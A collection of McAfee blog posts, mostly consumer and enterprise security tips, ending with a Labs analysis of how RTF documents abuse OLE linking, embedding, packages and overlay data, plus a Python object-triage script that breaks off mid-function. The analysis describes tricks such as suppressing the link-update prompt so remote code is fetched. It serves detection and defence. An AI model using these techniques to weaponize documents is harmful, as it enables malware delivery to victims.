The organization’s data can easily leak via shadow cloud services; for example, users converting a PDF of the employee phone list, translating a project plan, or using a cloud-based presentation tool or unmanaged collaboration services. The corporation is responsible for data loss from its employees, no matter how it occurs. So IT needs visibility into all cloud services, even those set up by individual users or small groups. Once you have a comprehensive picture of unsanctioned cloud usage, this information should be shared with the purchasing team to help them decide which services to approve.

  2. Integrate with global SSO

Global single sign-on services can ensure that users’ access is removed from all services when they leave the organization, as well as reduce the risk of data loss from password reuse. In a non-SSO service, users often call the helpdesk team when they’ve forgotten their passwords, so SSO has the added benefit of reducing call volume.

  3. Work with GRC and workshop how users use cloud

GRC (governance, risk and compliance) should be brought in to help define cloud use policies. Often, they are unsure how clouds are being used and what data is being uploaded, and therefore policies are general. Create a team including users, GRC and IT security to define policies for the real world by reviewing the possible actions that can be taken in each particular cloud service and ensure policies are defined for all eventualities.

  4. Review IaaS – Don’t assume DevOps did everything right

The fastest-growing area of cloud is IaaS—AWS, Azure and Google Cloud Platform. Here, it is very easy for developers to misconfigure the settings and leave data open to attackers. Technology is needed to check for all IaaS services (we always find more than people believe they have) and their settings—ideally, this would be a system that can automatically change settings to secure options.

  5. Keep up to date with technology—serverless, containers, cloud email services, etc.

The cloud includes many technologies that are constantly evolving; therefore, security needs to change too. Developers are often at the forefront of technological advances—bringing in code from GitHub, running container systems that only live for a few minutes (even this isn’t too short a time to require safeguarding) and more. IT security needs to be in partnership with the development teams and deploy technologies to defend against the latest threats.

  6. Integrate with web gateway and DLP—don’t lose security as you move to cloud

After investing time and money over the last decade on security, you don’t want to lose that investment when moving to the cloud. As systems and data are moved skyward, you should deploy technologies that can integrate with your existing services and technology. For example, you shouldn’t have two different DLP models depending on the computing services used by your employees. Deploy systems that can integrate with each other, preferably with a single-pane-of-glass management system.

  7. Don’t assume CSPs will keep your logs forever

If the worst happens, you need to investigate the history of a data loss incident. CSPs will rarely save data logs forever—refer to your contract to find out how long they keep logs, and consider having your own logs so that forensic investigations can be executed even if the original data loss incident was some time ago.

  8. Consider differential policies based on location, device, etc.

Once data is in the cloud, the whole idea is to facilitate global working. Is that always appropriate? For example, what if an employee wants to download a sensitive corporate document via a cloud service to an unmanaged device? Consider the situations your employees will encounter, and form policy that provides the maximum amount of security required while causing the least amount of disruption possible.

  9. Promote the clouds you DO like to your users

Carrots work better than sticks to train users. Don’t just block the services you don’t like, promote widely the cloud services you approve of, those that conform to your security needs, your performance indicators and capabilities. Promote them via the intranet, blogs and internal marketing, and redirect requests to unsupported services back to those you like.

  10. Privacy and security is everyone’s responsibility: Bring in other departments and users

Perhaps the last recommendation should be the first: Use every method available to train users, but before you do, work with those users and their representatives to define appropriate policies. The aim is to encourage users to use cloud services that are not only safe, but will allow them to be as productive as possible. The users themselves typically have great ideas of the services they’d like to use, why and how, so bring them in to help define the policies and work together with GRC.

Here’s to successful and secure cloud deployment, and to keeping your users and customer personal data as secure as you can in 2020 and beyond.

For more information, take a look at our additional resource on safeguarding your personal data in the cloud.

The post Top 10 Cloud Privacy Recommendations for Businesses appeared first on McAfee Blogs.

Security Lessons From 2019’s Biggest Data Breaches
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/2019-data-breaches/
Wed, 29 Jan 2020 22:44:36 +0000
2019 already feels like it’s worlds away, but the data breaches many consumers faced last year are likely to have lasting effects. As we look back on 2019, it’s important to reflect on how our online security has been affected by various threats. With that said, let’s take a look at the biggest breaches of the year and how they’ve affected users everywhere.

Capital One breach

In late July, approximately 100 million Capital One users in the U.S. and 6 million in Canada were affected by a breach exposing about 140,000 Social Security numbers, 1 million Canadian Social Insurance numbers, 80,000 bank account numbers, and more. As one of the 10 largest banks based on U.S. deposits, the financial organization was certainly poised as an ideal target for a hacker to carry out a large-scale attack. The alleged hacker claimed that the data was obtained through a firewall misconfiguration, allowing for command execution with a server that granted access to data in Capital One’s storage space.

Facebook breach

In early September, a security researcher found an online database exposing 419 million user phone numbers linked to Facebook accounts. The exposed server was left without password protection, so anyone with internet access could find the database. The breached records contained a user’s unique Facebook ID and the phone number associated with the account. In some instances, the records also revealed the user’s name, gender, and location by country.

Collection #1 breach

Last January, we met Collection #1, a monster data set that exposed 772,904,991 unique email addresses and over 21 million unique passwords. Security researcher Troy Hunt first discovered this data set on the popular cloud service MEGA, specifically uncovering a folder holding over 12,000 files. Due to the sheer volume of the breach, the data was likely comprised of multiple breaches. When the storage site was taken down, the folder was then transferred to a public hacking site, available for anyone to take for free.

Verifications.io breach

Less than two months after Collection #1, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm Verifications.io. This company provides a service for email marketing firms to outsource the extensive work involved with validating mass amounts of emails. This service also helps email marketing firms avoid the risk of having their infrastructure blacklisted by spam filters. Therefore, Verifications.io was entrusted with a lot of data, creating an information-heavy database complete with names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, and more.

Orvibo breach

In mid-June, Orvibo, a smart home platform designed to help users manage their smart appliances, left an Elasticsearch server (a highly scalable search and analytics engine that allows users to store, search, and analyze big volumes of data in real time) online without password protection. The exposure left at least two billion log entries, each containing customer data, open to the public. This data included customer email addresses, the IP addresses of the smart home devices, Orvibo usernames, and hashed passwords, i.e. unreadable strings of characters that are designed to be impossible to convert back into the original password.

What Users Can Learn From Data Breaches

Data breaches serve as a reminder that users and companies alike should do everything in their power to keep personal information protected. As technology continues to become more advanced, online threats will also evolve to become more sophisticated. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of massive data leaks. If you think you might have been affected by a data breach or want to take the necessary precautions to safeguard your information, follow these tips to help you stay secure:

  • Research before you buy. Although you might be eager to get the latest new device, some are made more secure than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks these features, consider upgrading.
  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords consistently to further protect your data.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.
  • Use a comprehensive security solution. Use a solution like McAfee Total Protection to help safeguard your devices and data from known vulnerabilities and emerging threats.

Stay Up to Date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Security Lessons From 2019’s Biggest Data Breaches appeared first on McAfee Blogs.

What You Need to Know About the FedEx SMiShing Scam
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/fedex-sms-phishing-scam/
Wed, 29 Jan 2020 00:59:53 +0000
You receive a text message saying that you have a package out for delivery. While you might feel exhilarated at first, you should think twice before clicking on that link in the text. According to CNN, users across the U.S. are receiving phony text messages claiming to be from FedEx as part of a stealthy SMS phishing (SMiShing) campaign.

How SMiShing Works

This SMiShing campaign uses text messages that show a supposed tracking code and a link to “set delivery preferences.” The link directs the recipient to a scammer-operated website disguised as a fake Amazon listing. The listing asks the user to take a customer satisfaction survey. After answering a couple of questions, the survey asks the user to enter personal information and a credit card number to claim a free gift, which still requires a small shipping and handling fee. But according to HowtoGeek.com, agreeing to pay the small shipping fee also signs the user up for a 14-day trial to the company that sells the scam products. After the trial period, the user will be billed $98.95 every month. What’s more, the text messages use the recipient’s real name, making this threat even stealthier.

How to Stay Protected

So, what can online shoppers do to defend themselves from this SMiShing scam? Check out the following tips to remain secure:

  • Be careful what you click on. Be sure to only click on links in text messages that are from a trusted source. If you don’t recognize the sender, or the SMS content doesn’t seem familiar, stay cautious and avoid interacting with the message.
  • Go directly to the source. FedEx stated that it would never send text messages or emails to customers that ask for money or personal information. When in doubt about a tracking number, go to the main website of the shipping company and search the tracking number yourself.
  • Enable the feature on your mobile device that blocks texts from the Internet. Many spammers send texts from an Internet service in an attempt to hide their identities. Combat this by using this feature to block texts sent from the Internet.
  • Use mobile security software. Make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What You Need to Know About the FedEx SMiShing Scam appeared first on McAfee Blogs.

Top 10 Cloud Privacy Recommendations for Consumers https://www.mcafee.com/blogs/enterprise/cloud-security/top-10-cloud-privacy-recommendations-for-consumers/ https://www.mcafee.com/blogs/enterprise/cloud-security/top-10-cloud-privacy-recommendations-for-consumers/#respond Tue, 28 Jan 2020 15:00:15 +0000 /blogs/?p=98303

It’s Data Privacy Day and when it comes down to it, most of us don’t know exactly how many organizations have our data—let alone how it’s being collected or what it is being used for. Unfortunately, the stakes are higher than ever for those who are unwilling to take appropriate safeguards to defend their personal data, including identity theft, financial loss, and more.

While the cloud presents a wealth of opportunity for increased productivity, connectivity and convenience, it also requires a new set of considerations for ensuring safe use. There are many, but here are the top ten:

1. Don’t reuse passwords.

Password reuse is a common problem, especially in consumer cloud services. If you reuse passwords, you only need one of your cloud services to be breached—once criminals have stolen your credentials through one service, they potentially have access to every account that shares those same credentials, including banking platforms, email and other services where sensitive data is stored. When using a cloud service for the first time, it’s easy to think that if the data you are using in that particular service isn’t confidential, then it doesn’t matter if you use your favorite password. But a good way to think of it is this: many passwords, one breach; one password, (potentially) many breaches. If you’re concerned about being able to remember them, look into obtaining a password manager.

2. Don’t share folders, share files

Many cloud services allow collaboration or file sharing. If you only want to share a few files, share those and not a complete folder. It’s all too easy to over-share without realizing what else is in the folder—or to forget who you shared it with (or that you shared it at all!) and later add private files that were never meant to be disseminated.

3. Be careful with auto-sync (it could bring in malware)

If you share a folder with someone else, many cloud services provide auto-sync, so that when another user adds new files, they get synced to everyone in the share. The danger here is that if someone you are sharing with gets infected by malware, this malware could be uploaded to the cloud and downloaded to your devices automatically.

4. Be careful of services that ask for your data

When logging into a new service, you may be asked for some personal data; for example, your date of birth. Why should they ask, and what will they do with this information? If they can tie that to your email address, and another service obtains your zip code and a third service asks for your mobile number, you can see that anyone collating that information could have enough to try to steal your identity. If there’s no reason why a service should have that data, use a different service (or, at least, give them incorrect information).

5. Read EULA & privacy policies – who owns the data?

I know this sounds hard, but it is worth it: Does the cloud provider claim that they own the data you upload? This may give them the right, or at least enough rights in their own mind, to sell your data to data brokers. This is more common than you think—you should never use a service that claims it owns your data.

6. Think twice about mobile apps and their data collection

Many cloud services have a mobile app as a way to access their service. Before using a mobile app, look at the data it says it will collect. Often the app collects more data than would be collected if you were to access the service via browser.

7. If unsure, ask your IT department if they have reviewed the service.

Some organizations’ IT departments will have already reviewed a cloud service and decided if it is acceptable for corporate use. It’s in their interest to keep their users secure, especially as so many devices now contain both personal and business data. Ask them if they have reviewed a service before you access it.

8. Don’t use public Wi-Fi hotspots without using a VPN for encryption.

Public Wi-Fi can be a place for data interception. Always use a VPN or encryption technology to ensure data is encrypted between your device and cloud services when on a public Wi-Fi.

9. Enable multi-factor authentication.

Cloud services that are well designed will offer additional security services, such as multi-factor authentication. Use those, and any other security features that you can.

10. Don’t share accounts with friends and family.

It’s often second nature to share with our friends and family. But are they as concerned about privacy as you are? Don’t share accounts, otherwise if they let their guard drop, your data could be compromised.

Check out more ways to take action and protect your data.

Take a look at our additional resource for safeguarding your personal data in the cloud.

The post Top 10 Cloud Privacy Recommendations for Consumers appeared first on McAfee Blogs.

Take Action This Data Privacy Day https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-day-2020/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-day-2020/#respond Tue, 28 Jan 2020 14:00:26 +0000 /blogs/?p=98291

We all know that data breaches have been on the rise, and hackers are finding clever, new ways to access our devices and information. But sometimes it takes a little push to get us to take action when it comes to protecting our most sensitive information. That’s why this Data Privacy Day, on January 28th, we have the perfect opportunity to own our privacy by taking the time to safeguard data, and help others do the same.

After all, there are now roughly four billion consumers connected online, living various moments of truth that could potentially put them at risk. From sharing photos and socializing with friends, to completing bank transactions—people expect to do what they desire online whenever and wherever they want. But as the saying goes, “with great power comes great responsibility”, and it is imperative that consumers take accountability, not just by enjoying the advantages of connecting online, but by protecting their online identities, too.

Remember, your personal information and online presence are as valuable as money, and what you post online can last a lifetime. Data Privacy Day is a reminder for everybody to make sure that they are protecting what matters most to them: their personal data, as well as their families and friends.

So, let’s get started. Even if you have a large online footprint, protecting this information doesn’t have to be overwhelming.

Here are a few tips:

Update your privacy and security settings—Begin with the websites and applications that you use the most. Check to see if your accounts are marked as private, or if they are open to the public. Also, look to see if your data is being leaked to third parties. You want to select the most secure settings available, while still being able to use these tools correctly. Here’s a guide from StaySafeOnline to help you get started.

Start the New Year with a new digital you—When opening new online accounts for sharing personal information such as your email address or date of birth, create a new digital persona that has alternative answers that only you would know. This will limit online tracking of your real personal information.

Lock down your logins—At the same time, secure your logins by making sure that you are creating long and unique passphrases for all of your accounts. Use multi-factor authentication, when available. This is a security protocol that takes more than one step to validate your login, such as a password plus a code sent to your mobile device, or a fingerprint. It is exponentially more secure than a simple password.

Spread the word and get involved—Once you have done your own privacy check, help others do the same. It’s important that we all feel empowered to protect our privacy, so share the safety tips in this article with your family, coworkers, and community. Here are some helpful resources to create privacy awareness where you live.

Protect your family and friends—If you are a parent, you can make a big difference by helping raise privacy-savvy kids. After all, today’s kids represent the future of online security. If they start building their digital footprints with solid safety habits, it makes all of us more secure.

Begin with this handy tip sheet.

Own your information—It’s time for everyone to feel empowered to own their information. While there will always be online threats, you can minimize any potential harm by committing yourself to the action steps we listed above. Once you have, spread the word by using the hashtag #privacyaware on Twitter, Instagram, or Facebook.

Let’s make this 12th annual international Data Privacy Day the most effective ever! Stay up to date with all the event happenings, here, and keep informed year-round on the latest threats and security tips.

The post Take Action This Data Privacy Day appeared first on McAfee Blogs.

Data Goes Supernova: Exploring Security at the Cloud Edge https://www.mcafee.com/blogs/enterprise/cloud-security/data-goes-supernova-exploring-security-at-the-cloud-edge/ https://www.mcafee.com/blogs/enterprise/cloud-security/data-goes-supernova-exploring-security-at-the-cloud-edge/#respond Tue, 28 Jan 2020 05:01:12 +0000 /blogs/?p=98287

Modern enterprises are fueled by data. The force of the cloud has been like gravity in a supernova, causing data to explode outward and disperse forever. No longer constrained by the network, the free flow of data to cloud service providers and a wide range of devices fragments visibility and control for enterprise security.

In our latest study on cloud adoption and risk, we traverse the paths of enterprise data as it disperses beyond the network perimeter. Through this research, which combines survey results from 1,000 enterprises in 11 countries and anonymized event data from 30 million enterprise cloud users, we are able to uncover the new areas of risk every enterprise must address in our cloud-first world.

To jump in now, download the full report here: Enterprise Supernova: The Data Dispersion Cloud Adoption and Risk Report.

In the report we evaluate three areas of context that together address the dispersion of data to the cloud:

  1. Cloud context: Data protection must understand the creation and flow of data within the cloud, through collaboration and inter-cloud sharing.

Twelve percent of files shared in the cloud contain sensitive data, an increase of 57% year over year.

  2. Device context: IT needs the ability to understand whether the device accessing sensitive data is a personal device or one which they control. Data loss to personal, unmanaged devices cannot be remediated.

Only 41% of companies can control personal device access to their data in the cloud.

  3. Web context: The continual expansion of cloud services is impossible to predict, requiring rules that manage access through the web before data reaches an unknown cloud destination.

C-Level IT leaders see the risk of “Shadow IT,” while manager-level decision makers are less likely to report risk to their data from unsanctioned applications.

This is just a preview of the findings in this study. For the full story, download the entire report here: Enterprise Supernova: The Data Dispersion Cloud Adoption and Risk Report.

The post Data Goes Supernova: Exploring Security at the Cloud Edge appeared first on McAfee Blogs.

Where’s the Truth Online? How to Build Your Family’s Digital Discernment https://www.mcafee.com/blogs/consumer/family-safety/wheres-the-truth-online-building-up-your-familys-digital-discernment/ https://www.mcafee.com/blogs/consumer/family-safety/wheres-the-truth-online-building-up-your-familys-digital-discernment/#respond Sat, 25 Jan 2020 15:00:53 +0000 /blogs/?p=98239

Note: This is Part I of a series on equipping your family to fight back against fake news online.

Fake news is chipping away at our trust in the government, the media, and in one another. And, because our kids spend so much time in the online space, it’s more important than ever to help them understand how to separate truth from fiction.

How dangerous is the spread of misinformation? According to one study, 75% of people who see fake news believe it’s real. This inability to discern is at the core of how a false piece of information — be it a story, a photo, a social post, or an email — spreads like wildfire online.

Fake news erodes trust

A 2019 Pew Institute study revealed that Americans rank fake news as a bigger problem in the U.S. than terrorism, illegal immigration, racism, and sexism, and believe the spread of fake news is causing ‘significant harm’ to the nation and needs to be stopped.

At the root of the issue is that too much news is coming at us from too many sources. True or not, millions of people are sharing that information, and they are often driven more by emotion than by fact.

According to Author and Digital Literacy Expert Diana Graber, one of a parent’s most important roles today is teaching kids to evaluate and be discerning with the content they encounter online.

“Make sure your kids know that they cannot believe everything they see or read online. Give them strategies to assess online information. Be sure your child’s school is teaching digital literacy,” says Graber.

Kids encounter and share fake news on social networks, chat apps, and videos. Says Graber, the role of video will rise as a fake news channel as AI technology advances.

“I think video manipulation, such as deepfake videos, is a very important area to keep an eye on in the future. So much of the media that kids consume is visual, so it will be important for them to learn visual literacy skills too,” says Graber.

The hidden costs of fake news

A December Facebook post, warning people that men driving white vans were part of an organized human trafficking ring, quickly went viral on several social networks.

Eventually, law enforcement exposed the post as fake; people shrugged it off and moved on. But in its wake, much was lost that didn’t go viral. The fake post was shared countless times. With each share, someone compromised a small piece of trust.

The false post caused digital panic and cast uncertainty on our sense of security and community. The post cost us money. The false information took up the resources of several law enforcement agencies that chose to investigate. It cost us trust. Public warnings even made it to the evening news in some cities.

The spread of fake news impacts our ability to make wise, informed decisions. It chips away at our expectation of truth in the people and resources around us.

Fake news that goes viral is powerful. It can impact our opinions about important health issues. It can damage companies and the stock market, and destroy personal reputations.

In the same Pew study, we learned about another loss — connection. Nearly 54 percent of respondents said they avoid talking with another person because that person may bring made-up news into the conversation.

The biggest loss? When it’s hard to see the truth, we are all less well informed, which creates obstacles to personal and cultural progress.

Family talking points

Here are three digital literacy terms defined to help you launch the fake news discussion.

  1. Fake news: We like the definition offered by PolitiFact: “Fake news is made-up stuff, masterfully manipulated to look like credible journalistic reports that are easily spread online to large audiences willing to believe the fictions and spread the word.”
     Discuss: Sharing fake news can hurt the people in the story as well as the credibility of the person sharing it. No one wants to be known for sharing sketchy content, rumors, or half-truths.
     Do: Sit down with your kids. Scroll through their favorite social networks and read some posts or stories. Ask: What news stories spark your interest, and why? Who posted this information? Are the links in the article credible? Should I share this piece of content? Why or why not?
  2. Objectivity: Content or statements based on facts that are not influenced by personal beliefs or feelings.
     Discuss: News stories should be objective (opinion-free), while opinion pieces can be subjective. When information (or a person) is subjective, you can identify personal perspectives, feelings, and opinions. When information (or a person) is objective, it’s void of opinion and based on facts.
     Do: Teaching kids to recognize objective vs. subjective content can be fun. Pick up a local newspaper (or access one online). Read the stories on the front page (they should contain only facts). Flip to the Op-Ed page and discuss the shift in tone and content.
  3. Discernment: A person’s ability to evaluate people, content, situations, and things well. The ability to discern is at the core of decision-making.
     Discuss: To separate truth from fiction online, we need to be critical thinkers who can discern truth. Critical thinking skills develop over time and differ depending on the age group.
     Do: Watch this video from Cyberwise on Fake News. Sit down together and Google a current news story. Compare how different news sites cover the same news story. Ask: How are the headlines different? Is there a tone or bias? Which story do you believe to be credible, and why? Which one would you feel confident sharing with others?

The increase in fake news online has impacted us all. However, with the right tools, we can fight back and begin to restore trust. Next week, in Part II of this series, we’ll discuss our personal responsibility in the fake news cycle and specific ways to identify fake news.

The post Where’s the Truth Online? How to Build Your Family’s Digital Discernment appeared first on McAfee Blogs.

An Inside Look into Microsoft Rich Text Format and OLE Exploits https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/#respond Fri, 24 Jan 2020 18:09:03 +0000 /blogs/?p=98259

There has been a dramatic shift in the platforms targeted by attackers over the past few years. Up until 2016, browsers tended to be the most common attack vector used to exploit and infect machines, but now Microsoft Office applications are preferred, according to a report published here in March 2019. The increasing use of Microsoft Office as an exploitation target poses an interesting security challenge: weaponized documents in email attachments are now a top infection vector.

Object Linking and Embedding (OLE), a technology based on the Component Object Model (COM), is a feature of Microsoft Office documents that allows objects created in other Windows applications to be linked or embedded into a document, creating a compound document structure and providing a richer user experience. OLE has been massively abused by attackers over the past few years in a variety of ways. OLE exploits in the recent past have been observed loading COM objects to orchestrate and control process memory, taking advantage of parsing vulnerabilities in COM objects, hiding malicious code, or connecting to external resources to download additional malware.

Microsoft Rich Text Format is heavily used in email attachments in phishing attacks. Its wide adoption in phishing attacks is primarily attributed to its ability to contain a wide variety of exploits, which makes it an efficient delivery mechanism for targeting victims. RTF files can embed various object types either to exploit parsing vulnerabilities or to aid further exploitation. The Object Linking and Embedding feature in RTF files is largely abused either to link the RTF document to external malicious code or to embed other file format exploits within the document and use it as an exploit container. In short, the RTF file format is very versatile.

In the sections below, we outline some of the exploitation and infection strategies used in Microsoft Rich Text Format files over the recent past, and towards the end we reflect on the key takeaways that can help automate the analysis of RTF exploits and set the direction for a generic analysis approach.

RTF Control Words

Rich Text Format files are heavily formatted using control words. Control words in RTF files primarily define the way the document is presented to the user. Since these control words carry associated parameters and data, errors in parsing them can become a target for exploitation. Exploits in the past have also been found using control words to embed malicious resources. Consequently, it is important to examine every destination control word that consumes data and to extract its stream. The RTF specification describes several hundred control words that consume data.

RTF parsers must also be able to handle the control word obfuscation mechanisms commonly used by attackers, to further aid the analysis process. Below is one earlier exploit instance that used control word parameters to introduce an executable payload inside the datastore control word.

Overlay Data in RTF Files

Overlay data is additional data appended to the end of RTF documents. It is predominantly used by exploit authors to embed decoy files or additional resources, either in the clear or in encrypted form, in which case it is usually decrypted once the attacker-controlled code executes. Overlay data beyond a certain size should be deemed suspicious and must be extracted and analysed further. Note that Microsoft Word’s RTF parser ignores overlay data while processing RTF documents. Below are some instances of RTF exploits with a large volume of overlay data appended at the end of the file; the CVE-2015-1641 sample embeds both the decoy document and multi-staged shellcodes delimited by markers.

Object Linking and Embedding in RTF Files

Linked or embedded objects in RTF documents are represented as RTF objects, specifically by the RTF destination control word “object”. The data for the embedded or linked object is stored as the parameter of the RTF sub-destination control word “objdata”, hex-encoded, in the OLESaveToStream format. The modifier control word “objclass” determines the type of the object embedded in the RTF file and helps the client application render the object. However, the hex-encoded object data given as the argument to “objdata” can also be heavily obfuscated, either to make reverse engineering and analysis more time consuming or to break immature RTF parsers. OLE has been one of the dominant attack vectors in the recent past, with many instances of OLE-based exploits used in targeted attacks, so robust RTF parsers for the extraction of objects, along with deeper inspection of the object data, are extremely critical.

Object Linking – Linking RTF to External Resource

Using object linking, it is possible to link an RTF file to a remote object, which could be a malicious resource hosted on a remote server. This makes the RTF file behave as a downloader that subsequently executes the downloaded resource by invoking the registered application-specific resource handlers. Inspecting the modifier control words of “object”, linked objects are indicated by another nested control word, “objautlink”, as represented below in the RTF document.

As indicated in the above representation, the object data given as the argument to the RTF control word “objdata” is an OLE1.0 NativeStream in the OLESaveToStream format, followed by the NativeDataSize indicating the size of the OLE2.0 compound document that is wrapped in the NativeStream. As per the Rich Text Format specification, if the object is linked to the container application, which in this case is the RTF document, the Root Storage directory entry of the compound document will have the CLSID of StdOleLink, indicating a linked object. Also, when the object is in the OLE2.0 format, the linked source data is specified in the MonikerStream of the OLEStream structure. As highlighted below, while parsing the object data, the ole32.OleConvertOLESTREAMToIStorage function is responsible for converting the OLE1.0 NativeStream data to the OLE2.0 structured storage format. Following the pointer to the OLE stream, lpolestream, allows us to visualize the parsed native data. Below is a memory snapshot taken when an RTF document with a linked object was parsed by the winword.exe process.

Launching the RTF document with the link to external object will throw up a dialogue box asking to update the data from the linked object, as shown below.

However, this is not an ideal exploitation strategy for targeting victims. The prompt can be eliminated by inserting another modifier control word, “objupdate”, which internally calls the link object’s IOleObject::Update method to update the link’s source.

Subsequently urlmon.dll, which is the registered server for the URL Moniker, is instantiated.

Once the COM object is instantiated, the connection is initiated to the external resource and, based on the content-type header returned by the server in the response, URL Moniker consults the Mime database in the registry and invokes registered application handlers.

Details on how the URL Moniker is executed, and the algorithm used to determine which handlers to invoke, are described by Microsoft here. We have seen multiple such RTF exploits in the past, including CVE-2017-0199, CVE-2017-8756 and others, using Monikers to download and execute remote code.

The COM objects used in the mentioned exploits have since been blacklisted by Microsoft in newer versions, but similar techniques could be used in future, which essentially necessitates the analysis of OLE structured storage streams.

Object Embedding – RTF Containing OLE Controls

As indicated earlier, embedded objects are represented in the container documents in the OLE2 format. When the object is stored in the OLE2 format, the container application (here Rich Text Format files) creates the OLE Compound File Storage for each of the objects embedded and the respective object data is stored in the OLE Compound File Stream Objects. Layout of the container documents storing embedded objects is as represented below and described in the Microsoft documentation here.

RTF exploits have historically been found embedding and loading multiple OLE controls in order to bypass exploit mitigations and to take advantage of memory corruption vulnerabilities in vulnerable OLE controls. Embedded OLE controls in an RTF document are usually indicated by the nested control word “objocx” or “objemb” followed by “objclass” with the name of the OLE control used to render the object as its argument. Below is one example of an earlier exploit used in targeted attacks, which exploited a vulnerability in a COM object and loaded another OLE control, carrying the staged malicious code, to aid the exploitation process. It is therefore critical to extract this object data, extract the OLE2 compound file storage and extract each of the stream objects for further inspection for hidden malicious shellcode.

Object Embedding – RTF Containing Other Documents

Malicious RTF documents can use the OLE functionality to embed other file formats like Flash files and Word documents, either to exploit the respective file format’s vulnerabilities or to set the stage for successful exploitation. Multiple RTF exploits have been observed in the past embedding OOXML documents via OLE to manipulate the process heap and bypass Windows exploit mitigations. In RTF files, embedded objects are usually indicated by the nested control word “objemb” with a version-dependent “ProgID” string as the argument to the nested control word “objclass”. One such RTF exploit used in targeted attacks in the recent past is shown below.

Below is another instance where the PDF file was physically embedded within the compound document. As mentioned, the embedded object is stored physically along with all the information required to render it.

In the embedded object, the creating application’s identifier is stored in the CLSID field of the compound file directory entry of the CFB storage object. If we take a look at the previous instance, when the object data is extracted and inspected manually, the following CLSID is observed in the CFB storage object, which corresponds to the CLSID_Microsoft_Word_Document.

When the OLE2 stream objects are parsed and the embedded OOXML is extracted and analysed after deflating the contents, we see the suspicious ActiveX object loading activity and embedded malicious code in one of the binary files. It is therefore important to extract the files embedded in an RTF document and analyse them further.

OLE Packages in RTF Files

RTF documents can also embed other file types like scripts (VBScript, JavaScript, etc.), XML files and executables via OLE packages. An OLE package in an RTF file is indicated by the ProgID string “package” as the argument to the nested control word “objclass”. The Packager format is a legacy format that does not have an associated OLE server; looking at the associated CLSID in the registry, there is no specific data format mapped to packages.

This essentially means that OLE packages can store multiple file types and, if a user clicks the object, the embedded file is executed, which leads to infection of the machine if it is a malicious script. RTF documents have been known to deliver malware by embedding scripts via OLE packages and then using Monikers, as described in the previous sections, to drop the files in the desired directory and execute them. One such instance of a malicious RTF document exploiting CVE-2018-0802 and embedding an executable file is shown below.

Since many RTF documents have been found delivering malware via OLE packages, it is critical to look for these embedded objects and analyse them for additional payloads. Executables or scripts embedded within an RTF document could well be malicious. Looking for OLE packages and extracting the embedded files should be a trivial task.

The above exploit delivery strategies can allow us to take a step towards building analysis frameworks for RTF documents. Primarily, inspecting the linked or embedded objects turns out to be the critical aspect of automated analysis tasks along with the RTF control words inspection. The following are the key takeaways:

  • Using the RTF file as a container, many other file format exploits can be embedded inside it via the Object Linking and Embedding feature, essentially weaponizing the RTF document.
  • Extracting and analysing embedded or linked objects for malicious code, payloads or resource handler invocations is essential.
  • If an RTF document carries a large volume of appended data, it must be examined further.
  • Non-OLE control words and OLE packages must also be analysed for malicious content.
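
Putting the takeaways above into practice, here is an added example (not code from the McAfee post) that walks the RTF group structure of a constructed sample, pulls out each embedded object’s embedding type, ProgID and \objdata blob, carves for the OLE2 compound-file signature and flags the legacy Package ProgID. The sample document, its ProgIDs and its hex payload are constructed for illustration and are not taken from any real exploit.

```python
r"""Triage of OLE objects embedded in an RTF document.

Walks the RTF group structure, pulls out every {\object ...} group, reads the
embedding type (\objemb, \objocx, \objlink), the ProgID passed to \objclass and
the hex blob under \objdata, then reports whether the decoded blob contains an
OLE2 compound file (magic D0 CF 11 E0 A1 B1 1A E1) and whether the ProgID is
the legacy "Package" format, which can wrap any file type.
"""
import re
from typing import Dict, List

OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
EMBED_TYPES = ("objemb", "objocx", "objlink", "objautlink")

# Constructed sample, not a real document: the \objdata hex follows the OLE1
# ObjectHeader layout (version, format id, length-prefixed class name, empty
# topic/item names, native data size) but the payload bytes are filler.
SAMPLE_RTF = r"""{\rtf1\ansi\deff0
{\fonttbl{\f0 Times New Roman;}}
\pard Quarterly report attached.\par
{\object\objemb\objw1440\objh1440{\*\objclass Word.Document.8}
{\*\objdata 01050000 02000000 10000000 576f7264 2e446f63 756d656e 742e3800
00000000 00000000 20000000 d0cf11e0 a1b11ae1 00000000 00000000 00000000
00000000 3e000300 feff0900}}
\par
{\object\objemb{\*\objclass Package}
{\*\objdata 01050000 02000000 08000000 5061636b 61676500 00000000 00000000
0c000000 02006e6f 7465732e 76627300}}
\par
}"""


def rtf_group_at(text: str, start: int) -> str:
    """Return the brace-balanced RTF group that opens at text[start]."""
    depth, i = 0, start
    while i < len(text):
        ch = text[i]
        if ch == "\\":
            i += 2          # escaped brace or start of a control word: never a brace
            continue
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
        i += 1
    return text[start:]     # unterminated group: take what is left


def objdata_bytes(group: str) -> bytes:
    """Decode the hex carried by the objdata destination inside one object group."""
    m = re.search(r"\{\\\*\\objdata\b", group)
    if not m:
        return b""
    inner = rtf_group_at(group, m.start())
    # Drop control words and brace/whitespace noise; exploit documents often
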